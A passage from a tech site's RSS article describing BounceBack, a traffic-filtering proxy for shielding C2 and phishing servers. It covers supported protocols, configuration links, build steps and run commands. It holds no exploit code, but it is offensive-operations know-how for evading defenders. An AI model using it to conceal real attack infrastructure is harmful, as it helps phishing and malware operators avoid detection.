the project.</li>
</ul>
<p>You can find the rules configuration page <span style="color: #3366ff;"><a target="_blank" style="color: #3366ff;" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2FD00Movenok%2FBounceBack%2Fwiki%2F1.-Rules" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';"><span style="text-decoration: underline;"><strong>HERE</strong></span></a></span></p>
<h2 id="ftoc-cau-hinh-proxy-va-cac-giao-thuc-duoc-ho-tro" class="ftwp-heading"><strong>Proxy configuration and supported protocols</strong></h2>
<p>The proxy section is used to configure where to listen and proxy traffic, what protocols to use, and how to bind rules together to filter traffic. Currently, BounceBack supports the following protocols:</p>
<ul>
<li>HTTP(s): For your web infrastructure.</li>
<li>DNS: For your DNS tunnels.</li>
<li>Raw TCP (with or without tls) and UDP: For custom protocols.</li>
<li>Custom Protocols: Custom protocols can be easily added by registering your new type in <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2FD00Movenok%2FBounceBack%2Fblob%2Fmain%2Finternal%2Fproxy%2Fmanager.go" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';"><strong>management program</strong></a>. You can find examples of proxies <span style="color: #3366ff;"><a target="_blank" style="color: #3366ff;" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2FD00Movenok%2FBounceBack%2Fblob%2Fmain%2Finternal%2Fproxy" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';"><strong>here.</strong></a></span></li>
</ul>
<p>You can find the proxy configuration page<span style="text-decoration: underline; color: #339966;"> <strong><a target="_blank" style="color: #339966; text-decoration: underline;" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2FD00Movenok%2FBounceBack%2Fwiki%2F2.-Proxies" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';">at this page.</a></strong></span></p>
<figure id="attachment_65342" aria-describedby="caption-attachment-65342" style="width: 640px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-65342 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/bounceback-2.jpg" alt="Proxy configuration and supported protocols" width="640" height="420" srcset="https://anonyviet.com/wp-content/uploads/2024/08/bounceback-2.jpg 640w, https://anonyviet.com/wp-content/uploads/2024/08/bounceback-2-300x197.jpg 300w" sizes="auto, (max-width: 640px) 100vw, 640px"/><figcaption id="caption-attachment-65342" class="wp-caption-text">Proxy configuration and supported protocols</figcaption></figure>
<h2 id="ftoc-huong-dan-cai-dat-bounceback" class="ftwp-heading"><strong>Instructions for installing BounceBack</strong></h2>
<h3 id="ftoc-cach-1-cai-dat-tu-ban-phat-hanh" class="ftwp-heading"><strong>Method 1: Install from release</strong></h3>
<p>Download the latest release from <strong><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2FD00Movenok%2FBounceBack%2Freleases" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';"><span style="text-decoration: underline;">this page</span></a></strong>  > Extract folder > Edit configuration file > Launch BounceBack.</p>
<h3 id="ftoc-cach-2-cai-dat-tu-ma-nguon" class="ftwp-heading"><strong>Method 2: Install from source code</strong></h3>
<p>Clone the project (don&#39;t forget <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgit-lfs.com%2F" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';"><strong>GitLFS</strong>)</a> > Settings<strong><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgoreleaser.com%2Finstall%2F" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';">  goreleaser</a> </strong>> Run command:</p>
<p><code>goreleaser release --clean --snapshot</code></p>
<h2 id="ftoc-cach-su-dung-bounceback" class="ftwp-heading"><strong>How to use BounceBack</strong></h2>
<p><strong>Step 1 (optional):</strong> Update banned_ips.txt list:</p>
<p><code>list:bash scripts/collect_banned_ips.sh &gt; data/banned_ips.txt</code></p>
<p><strong>Step 2:</strong> Edit config.yml for your needs: Configure rules to match traffic, proxies to analyze traffic using rules, and global variables for in-depth rule configuration.</p>
<p><strong>Step 3:</strong> Run BounceBack: ./bounceback</p>
<p><strong>Command line options:</strong></p>
<ul>
<li>-c, –config string: Path to the configuration file in YAML format (default is “config.yml”).</li>
<li>-l, –log string: Path to the log file (default is “bounceback.log”).</li>
<li>-v, –verbose count: Log details (0 = info, 1 = debug, 2+ = trace).</li>
</ul>
<p><span style="color: #339966;"><em><strong>See more: <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fdns-spy-cong-cu-phan-tich-dns-cua-domain-bat-ky%2F" class="local-link" rel="noopener">DNS Spy: Tool to analyze DNS of any Domain</a></strong></em></span></p>
<h2 id="ftoc-loi-ket" class="ftwp-heading"><strong>Conclusion</strong></h2>
<p><strong>BounceBack</strong> is a flexible tool that helps protect C2/phishing infrastructure. With its highly customizable, flexible filtering system and support for a wide range of protocols, BounceBack is an ideal choice to enhance the security of your system.</p>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/bounceback-shield-protects-c2-phishing-infrastructure-from-attacks/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2024/08/bounceback.jpg" medium="image"></media:content>
            	</item>
	</channel>
</rss>
